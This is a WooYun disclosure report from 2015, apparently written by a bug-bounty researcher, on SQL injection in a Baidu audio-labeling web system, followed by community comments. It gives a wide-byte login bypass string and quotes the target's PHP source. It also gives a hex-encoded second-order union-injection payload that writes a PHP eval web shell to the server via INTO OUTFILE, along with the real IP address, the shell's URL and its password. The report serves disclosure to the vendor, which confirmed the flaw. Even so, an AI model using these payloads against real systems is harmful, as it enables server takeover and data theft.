当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(223) 关注此漏洞

缺陷编号: WooYun-2015-157024

漏洞标题: 百度某系统SQL注入到Getshell

相关厂商: 百度

漏洞作者: 玉林嘎认证白帽子

提交时间: 2015-11-30 13:29

公开时间: 2016-01-14 18:46

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

52人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-30: 细节已通知厂商并且等待厂商处理中
2015-11-30: 厂商已经确认,细节仅向厂商公开
2015-12-10: 细节向核心白帽子及相关领域专家公开
2015-12-20: 细节向普通白帽子公开
2015-12-30: 细节向实习白帽子公开
2016-01-14: 细节向公众公开

简要描述:

我又来了

详细说明:

http://115.239.210.62:8080 百度一个关于音频的系统



页面gbk猜测存在宽字节注入



1.png





%df' or 1# bypass登录



2.png







3.png





进入后台就想shell一波 但是完全没有上传的地方

刚好页面有些有warnming 报出路径 还想利用之前方法写波shell



4.png





但是写shell的into outfile '路径' 单引号被转义了 是不行的



后台存在很多注入 尝试读文件试试



6.png





是可以读文件的 那么下面的思路就是审计源码 寻找shell方法



code 区域
/home/audio/label/apache/htdocs/new_user_post.php
/home/audio/label/apache/htdocs/new_user.php
/home/audio/label/apache/htdocs/label/index.php
/home/audio/label/apache/htdocs/register.php
/home/audio/label/apache/htdocs/user_management.php
/home/audio/label/apache/htdocs/user_modify.php
/home/audio/label/apache/htdocs/user_work.php
/home/audio/label/apache/htdocs/user_work_show.php
/home/audio/label/apache/htdocs/session_destroy.php
/home/audio/label/apache/htdocs/user_delete.php
/home/audio/label/apache/htdocs/member_login.php
/home/audio/label/apache/htdocs/inc.php
/home/audio/label/apache/htdocs/user_modify_post.php





对上面文件进行读取 简单的增删改查 没有其他多余的操作



注入却无法引入单引号 根据经验 二次注入是可以引入'

接下来寻找二次注入 且注入位置位于 select操作 才可尝试写文件



突破点在下面文件

code 区域
/home/audio/label/apache/htdocs/user_work.php
/home/audio/label/apache/htdocs/user_work_show.php





code 区域
<?php
require('inc.php');
if (isset($_SESSION['wav']) && is_file($_SESSION['wav']) && !unlink($_SESSION['wav']))
{
echo "Warning:deleting".$_SESSION['wav']."failed";
}
if (isset($_SESSION['pic']) && is_file($_SESSION['pic']) && !unlink($_SESSION['pic']))
{
echo "Warning:deleting".$_SESSION['pic']."failed";
}
if (isset($_SESSION['adpcm']) && is_file($_SESSION['adpcm']) && !unlink($_SESSION['adpcm']))
{
echo "Warning:deleting".$_SESSION['adpcm']."failed";
}
if(isset($_GET['jump']))
{
if($_GET['jump']==1)
{
unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['table'],$_SESSION['effect'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu']);
}
else if($_GET['jump']==2)
{
unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['effect'],$_SESSION['table'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu'],$_SESSION['fcon'],$_SESSION['su']);
}
}
if(empty($_SESSION['pass']) || $_SESSION['pass']!="ok")
{
echo "请您重新<a href='index.php'>登录</a></br>";
header("refresh:2; URL='index.php'");
exit;
}
$link = getAN_DBLink();
if($_SESSION['auth']==2)
{
$sql="select id,Name,authority,real_name from annotator where id=".$_SESSION['id']."";
}
else if($_SESSION['auth']==1)
{
$sql="select id,Name,authority,real_name from annotator where authority>".$_SESSION['auth']." or id=".$_SESSION['id']."";
}
else if($_SESSION['auth']==0)
{
$sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";
}
else
{
echo "权限分配有误,请重新<a href='index.php'>登录</a></br>";
header("refresh:2; URL='index.php'");
exit;
}
$con="[query:".date('c')."]查询数据:".$sql.":user_work.php:line 61\r\n";
write_log($con);
$result=mysql_query($sql) or die("数据库查询失败");
$num=mysql_num_rows($result);
if($_SESSION['work']=="annotate")
$chn_type="标注";
else if($_SESSION['work']=="check")
$chn_type="检查";
else
$chn_type="精选";
?>





code 区域
else if($_SESSION['auth']==0)
{
$sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";
}



$_SESSION['auth'] 是我找到唯一在select中且有可能控制的参数

$_SESSION 是在登录赋值的 那么去看下登录文件



code 区域
/home/audio/label/apache/htdocs/member_login.php





code 区域
<?php
require_once ('inc.php');
if(empty($_POST['name'])){
echo "用户名不能为空,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
header("refresh:2; URL='index.php'");
//echo "用户名不能为空,自动返回登录界面...</br></br>";
//echo "点击返回<a href='index.php'>登录界面</a>";
// header('Location:http://10.210.26.11:8080/index.php');
exit;
}
else if(empty($_POST['password'])){
echo "密码不能为空,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
header("refresh:2; URL='index.php'");
exit;
}

else if(empty($_POST['yzm'])){
echo "验证码不能为空,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
header("refresh:2; URL='index.php'");
exit;
}
$link = getAN_DBLink();
$name = mysql_real_escape_string($_POST['name'], $link);
$pw = mysql_real_escape_string($_POST['password'], $link);
$code =$_POST['yzm'];
if( $code != $_SESSION["Checknum"])
{
echo "验证码错误,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
mysql_close();
header("refresh:2; URL='index.php'");
exit;
}
$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'";
$con="[query:".date('c')."]数据库查询:".$sql.":member_login.php:line 43\r\n";
write_log($con);
$result=mysql_query($sql, $link) or die("数据库查询失败");
$num=mysql_num_rows($result);
if($num==0)
{
echo "账户不存在,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
mysql_close();
header("refresh:2; URL='index.php'");
exit;
}
$rs=mysql_fetch_object($result);
//while($rs=mysql_fetch_object($result))
if ($rs != false)
{
$_SESSION['pass'] ="ok";
$_SESSION['num'] =0;
$_SESSION['name'] =$name;
$_SESSION['id'] =$rs->id;
$_SESSION['auth'] =$rs->authority;
$_SESSION['rname'] =$rs->real_name;
$_SESSION['gender'] =$rs->Gender;
$_SESSION['mobile'] =$rs->Mobile;
$_SESSION['ikey'] =$rs->Ikey;
$_SESSION['mail'] =$rs->Mail;
$_SESSION['type'] =$_POST['type'];
$time =date('U');
$ip ="";
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ip=$_SERVER['HTTP_CLIENT_IP'];
}
else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}
else{
$ip=$_SERVER['REMOTE_ADDR'];
}





code 区域
$_SESSION['auth']     =$rs->authority;





$rs又是根据

code 区域
$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'"



查询出来的



那么登录的时候利用联合查询直接控制authority 即可



name只需传入下面代码即可

code 区域
test%df' union select 1,0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027,3,4,5,6,7,8,9#





code 区域
0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027
0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'





通过联合查询 不仅bypass进入系统 而且在第二个字段控制为 0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'



进入之后访问 user_work.php 文件即可



最后生成shell http://115.239.210.62:8080/label/test.php 密码:s



QQ图片20151130132632.png





内网 未深入

漏洞证明:

http://115.239.210.62:8080 百度一个关于音频的系统



页面gbk猜测存在宽字节注入



1.png





%df' or 1# bypass登录



2.png







3.png





进入后台就想shell一波 但是完全没有上传的地方

刚好页面有些有warnming 报出路径 还想利用之前方法写波shell



4.png





但是写shell的into outfile '路径' 单引号被转义了 是不行的



后台存在很多注入 尝试读文件试试



6.png





是可以读文件的 那么下面的思路就是审计源码 寻找shell方法



code 区域
/home/audio/label/apache/htdocs/new_user_post.php
/home/audio/label/apache/htdocs/new_user.php
/home/audio/label/apache/htdocs/label/index.php
/home/audio/label/apache/htdocs/register.php
/home/audio/label/apache/htdocs/user_management.php
/home/audio/label/apache/htdocs/user_modify.php
/home/audio/label/apache/htdocs/user_work.php
/home/audio/label/apache/htdocs/user_work_show.php
/home/audio/label/apache/htdocs/session_destroy.php
/home/audio/label/apache/htdocs/user_delete.php
/home/audio/label/apache/htdocs/member_login.php
/home/audio/label/apache/htdocs/inc.php
/home/audio/label/apache/htdocs/user_modify_post.php





对上面文件进行读取 简单的增删改查 没有其他多余的操作



注入却无法引入单引号 根据经验 二次注入是可以引入'

接下来寻找二次注入 且注入位置位于 select操作 才可尝试写文件



突破点在下面文件

code 区域
/home/audio/label/apache/htdocs/user_work.php
/home/audio/label/apache/htdocs/user_work_show.php





code 区域
<?php
require('inc.php');
if (isset($_SESSION['wav']) && is_file($_SESSION['wav']) && !unlink($_SESSION['wav']))
{
echo "Warning:deleting".$_SESSION['wav']."failed";
}
if (isset($_SESSION['pic']) && is_file($_SESSION['pic']) && !unlink($_SESSION['pic']))
{
echo "Warning:deleting".$_SESSION['pic']."failed";
}
if (isset($_SESSION['adpcm']) && is_file($_SESSION['adpcm']) && !unlink($_SESSION['adpcm']))
{
echo "Warning:deleting".$_SESSION['adpcm']."failed";
}
if(isset($_GET['jump']))
{
if($_GET['jump']==1)
{
unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['table'],$_SESSION['effect'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu']);
}
else if($_GET['jump']==2)
{
unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['effect'],$_SESSION['table'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu'],$_SESSION['fcon'],$_SESSION['su']);
}
}
if(empty($_SESSION['pass']) || $_SESSION['pass']!="ok")
{
echo "请您重新<a href='index.php'>登录</a></br>";
header("refresh:2; URL='index.php'");
exit;
}
$link = getAN_DBLink();
if($_SESSION['auth']==2)
{
$sql="select id,Name,authority,real_name from annotator where id=".$_SESSION['id']."";
}
else if($_SESSION['auth']==1)
{
$sql="select id,Name,authority,real_name from annotator where authority>".$_SESSION['auth']." or id=".$_SESSION['id']."";
}
else if($_SESSION['auth']==0)
{
$sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";
}
else
{
echo "权限分配有误,请重新<a href='index.php'>登录</a></br>";
header("refresh:2; URL='index.php'");
exit;
}
$con="[query:".date('c')."]查询数据:".$sql.":user_work.php:line 61\r\n";
write_log($con);
$result=mysql_query($sql) or die("数据库查询失败");
$num=mysql_num_rows($result);
if($_SESSION['work']=="annotate")
$chn_type="标注";
else if($_SESSION['work']=="check")
$chn_type="检查";
else
$chn_type="精选";
?>





code 区域
else if($_SESSION['auth']==0)
{
$sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";
}



$_SESSION['auth'] 是我找到唯一在select中且有可能控制的参数

$_SESSION 是在登录赋值的 那么去看下登录文件



code 区域
/home/audio/label/apache/htdocs/member_login.php





code 区域
<?php
require_once ('inc.php');
if(empty($_POST['name'])){
echo "用户名不能为空,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
header("refresh:2; URL='index.php'");
//echo "用户名不能为空,自动返回登录界面...</br></br>";
//echo "点击返回<a href='index.php'>登录界面</a>";
// header('Location:http://10.210.26.11:8080/index.php');
exit;
}
else if(empty($_POST['password'])){
echo "密码不能为空,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
header("refresh:2; URL='index.php'");
exit;
}

else if(empty($_POST['yzm'])){
echo "验证码不能为空,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
header("refresh:2; URL='index.php'");
exit;
}
$link = getAN_DBLink();
$name = mysql_real_escape_string($_POST['name'], $link);
$pw = mysql_real_escape_string($_POST['password'], $link);
$code =$_POST['yzm'];
if( $code != $_SESSION["Checknum"])
{
echo "验证码错误,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
mysql_close();
header("refresh:2; URL='index.php'");
exit;
}
$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'";
$con="[query:".date('c')."]数据库查询:".$sql.":member_login.php:line 43\r\n";
write_log($con);
$result=mysql_query($sql, $link) or die("数据库查询失败");
$num=mysql_num_rows($result);
if($num==0)
{
echo "账户不存在,自动返回登录界面...</br></br>";
echo "点击返回<a href='index.php'>登录界面</a>";
mysql_close();
header("refresh:2; URL='index.php'");
exit;
}
$rs=mysql_fetch_object($result);
//while($rs=mysql_fetch_object($result))
if ($rs != false)
{
$_SESSION['pass'] ="ok";
$_SESSION['num'] =0;
$_SESSION['name'] =$name;
$_SESSION['id'] =$rs->id;
$_SESSION['auth'] =$rs->authority;
$_SESSION['rname'] =$rs->real_name;
$_SESSION['gender'] =$rs->Gender;
$_SESSION['mobile'] =$rs->Mobile;
$_SESSION['ikey'] =$rs->Ikey;
$_SESSION['mail'] =$rs->Mail;
$_SESSION['type'] =$_POST['type'];
$time =date('U');
$ip ="";
if(isset($_SERVER['HTTP_CLIENT_IP']))
{
$ip=$_SERVER['HTTP_CLIENT_IP'];
}
else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}
else{
$ip=$_SERVER['REMOTE_ADDR'];
}





code 区域
$_SESSION['auth']     =$rs->authority;





$rs又是根据

code 区域
$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'"



查询出来的



那么登录的时候利用联合查询直接控制authority 即可



name只需传入下面代码即可

code 区域
test%df' union select 1,0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027,3,4,5,6,7,8,9#





code 区域
0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027
0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'





通过联合查询 不仅bypass进入系统 而且在第二个字段控制为 0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'



进入之后访问 user_work.php 文件即可



最后生成shell http://115.239.210.62:8080/label/test.php 密码:s



QQ图片20151130132632.png





内网 未深入

修复方案:

登录之后全是注入哎。

版权声明:转载请注明来源 玉林嘎@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-11-30 18:45

厂商回复:

感谢关注百度安全!

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共3人评价):
登陆后才能进行评分
100%
0%
0%
0%
0%

评价

  1. 2015-11-30 13:31 | king7 ( 普通白帽子 | Rank:1807 漏洞数:248 | 3P is the life I want to live.)
    0

    表哥,你有点过分了

  2. 2015-11-30 13:32 | 我的邻居王婆婆 ( 普通白帽子 | Rank:3006 漏洞数:508 | 刚发现个好洞网站就挂了)
    0

    百度SQL注入两连击啊

  3. 2015-11-30 13:34 | 玉林嘎 认证白帽子 ( 普通白帽子 | Rank:933 漏洞数:107 )
    0

    感谢wooyun

  4. 2015-11-30 13:37 | whynot ( 普通白帽子 | Rank:670 漏洞数:134 | 为你解冻冰河 为你放弃世界有何不可)
    0

    闪电6666

  5. 2015-11-30 13:38 | _Thorns ( 普通白帽子 | Rank:1712 漏洞数:261 )
    0

    百度要过来打你了!

  6. 2015-11-30 13:40 | 我的邻居王婆婆 ( 普通白帽子 | Rank:3006 漏洞数:508 | 刚发现个好洞网站就挂了)
    0

    这是什么站啊,居然闪了

  7. 2015-11-30 13:43 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
    0

    好赞,变废为宝

  8. 2015-11-30 14:11 | 二愣子 ( 普通白帽子 | Rank:205 漏洞数:45 | 毛毛你是个好姑娘)
    0

    啪嚓~~~

  9. 2015-11-30 14:16 | 子非海绵宝宝 认证白帽子 ( 核心白帽子 | Rank:1358 漏洞数:142 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)
    0

    有雷!

  10. 2015-11-30 14:29 | answer 认证白帽子 ( 普通白帽子 | Rank:453 漏洞数:54 | 答案)
    0

    后排膜拜

  11. 2015-11-30 14:39 | 齐迹 ( 普通白帽子 | Rank:804 漏洞数:104 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)
    0

    闪电必关

  12. 2015-11-30 15:28 | 40huo ( 实习白帽子 | Rank:49 漏洞数:17 | 一代枪神 http://www.40huo.cn)
    0

    这个屌

  13. 2015-11-30 16:08 | 镱鍚 ( 普通白帽子 | Rank:184 漏洞数:30 | 。。!)
    0

    嘎子哥真屌。。

  14. 2015-11-30 16:26 | SH0X8001 ( 路人 | Rank:25 漏洞数:6 | 你猜)
    0

    好屌

  15. 2015-11-30 16:38 | Cheery ( 路人 | Rank:26 漏洞数:5 | 0.0)
    0

    恭喜啊 打雷了

  16. 2015-11-30 19:10 | Can ( 普通白帽子 | Rank:115 漏洞数:33 | 我是水一样的男子,因为党说我是流动人口。)
    0

    前排出售百度shell

  17. 2015-11-30 19:31 | ShAdow丶 ( 实习白帽子 | Rank:93 漏洞数:17 )
    0

    看到雷了 。

  18. 2015-11-30 19:36 | onpu ( 普通白帽子 | Rank:354 漏洞数:62 | 不轻诺 故我不负人 不信诺 故人不负我)
    0

    打雷要下雨雷欧

  19. 2015-11-30 23:56 | 孤梦° ( 普通白帽子 | Rank:128 漏洞数:48 )
    0

    闪电了 666

  20. 2015-12-10 18:59 | gainover 认证白帽子 ( 普通白帽子 | Rank:1805 漏洞数:97 | PKAV技术宅社区! -- gainover| 工具猫网络-...)
    0

    赞!

  21. 2015-12-10 19:56 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1878 漏洞数:154 | 不要患得患失,我羡慕你,但是我还是选择做...)
    0

    请收下我的膝盖!

  22. 2015-12-10 20:00 | 玉林嘎 认证白帽子 ( 普通白帽子 | Rank:933 漏洞数:107 )
    0

    @小胖子 @gainover - -

  23. 2015-12-10 20:30 | gainover 认证白帽子 ( 普通白帽子 | Rank:1805 漏洞数:97 | PKAV技术宅社区! -- gainover| 工具猫网络-...)
    0

    @玉林嘎 你的rank值好土豪!!

  24. 2015-12-20 18:51 | _Thorns ( 普通白帽子 | Rank:1712 漏洞数:261 )
    0

    又盼来一个,哈哈哈。

  25. 2015-12-20 19:42 | M4sk ( 普通白帽子 | Rank:1218 漏洞数:323 | 啥都不会....)
    0

    66666666

  26. 2016-01-14 19:10 | 金馆长 ( 路人 | Rank:4 漏洞数:2 | Up)
    0

    吃惊

  27. 2016-01-14 20:57 | JGHOOluwa ( 普通白帽子 | Rank:556 漏洞数:88 | 就是来看看大牛们如何超神的^-^)
    0

    666

  28. 2016-01-14 21:13 | lanyan ( 路人 | Rank:1 漏洞数:1 | qq 1614591916 求搞基 加我时记得备注woo...)
    0

    这getshell姿势 666

  29. 2016-01-14 23:18 | Sai、 ( 路人 | Rank:14 漏洞数:4 | for fun……)
    0

    这个shell拿的6,赞

  30. 2016-01-15 09:40 | 齐迹 ( 普通白帽子 | Rank:804 漏洞数:104 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)
    0

    这个注入 精彩666

  31. 2016-01-15 13:35 | D&G ( 普通白帽子 | Rank:566 漏洞数:113 | going)
    0

    二次注入写shell啊。6666

登录后才能发表评论,请先 登录